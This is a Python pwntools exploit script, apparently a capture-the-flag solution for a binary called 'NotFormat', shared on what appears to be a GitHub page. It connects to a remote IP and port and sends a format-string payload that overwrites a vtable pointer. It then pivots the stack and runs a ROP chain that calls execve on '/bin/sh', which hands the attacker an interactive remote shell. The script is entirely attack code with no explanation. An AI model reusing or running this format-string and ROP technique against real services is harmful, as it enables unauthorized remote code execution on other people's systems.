| #!/usr/bin/env python2 | |
| # -*- coding: utf-8 -*- | |
| from pwn import * | |
| context(arch='amd64', os='linux', log_level='info') | |
| elf = ELF('./NotFormat') | |
| libc = elf.libc | |
| fake_vtable_addr = 0x06CE400 | |
| vtable_addr = 0x6cb3d8 | |
| gadget = 0x43f17d | |
| prdir = 0x4005d5 | |
| praxr = 0x04c2358 | |
| prsir = 0x4017f7 | |
| prdxr = 0x442c47 | |
| leave = 0x400b68 | |
| syscall = 0x4683d6 | |
| # io = process(elf.path) | |
| io = remote('123.59.71.3', 20020) | |
| p = '' | |
| p += '%61821c%35$hn%3782c%36$hn%7070653c%37$n' | |
| p = p.ljust(112-40) | |
| p += '00000000' # rbx | |
| p += p64(fake_vtable_addr+0x80) # rbp | |
| p += '11111111' # r12 | |
| p += '00000000' # r13 | |
| p += '00000000' # r14 | |
| p += p64(prsir) # rip | |
| p += p64(fake_vtable_addr+0x80) | |
| p += p64(prdxr) | |
| p += p64(0x100) | |
| p += p64(prdir) | |
| p += p64(0) | |
| p += p64(praxr) | |
| p += p64(0) | |
| p += p64(syscall) | |
| p += p64(leave) | |
| assert len(p) <= 232 | |
| p = p.ljust(232) | |
| p += p64(fake_vtable_addr+0x38) | |
| p += p64(fake_vtable_addr+0x38+2) | |
| p += p64(vtable_addr) | |
| io.send(p) | |
| rop = '' | |
| rop += 'aaaaaaaa' | |
| rop += p64(praxr) | |
| rop += p64(59) | |
| rop += p64(prdir) | |
| rop += p64(fake_vtable_addr+0x80+0x60) | |
| rop += p64(prsir) | |
| rop += p64(0) | |
| rop += p64(prdxr) | |
| rop += p64(0) | |
| rop += p64(syscall) | |
| rop = rop.ljust(0x60) | |
| rop += '/bin/sh\x00' | |
| rop += '\x00'*12 | |
| io.send(rop) | |
| io.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment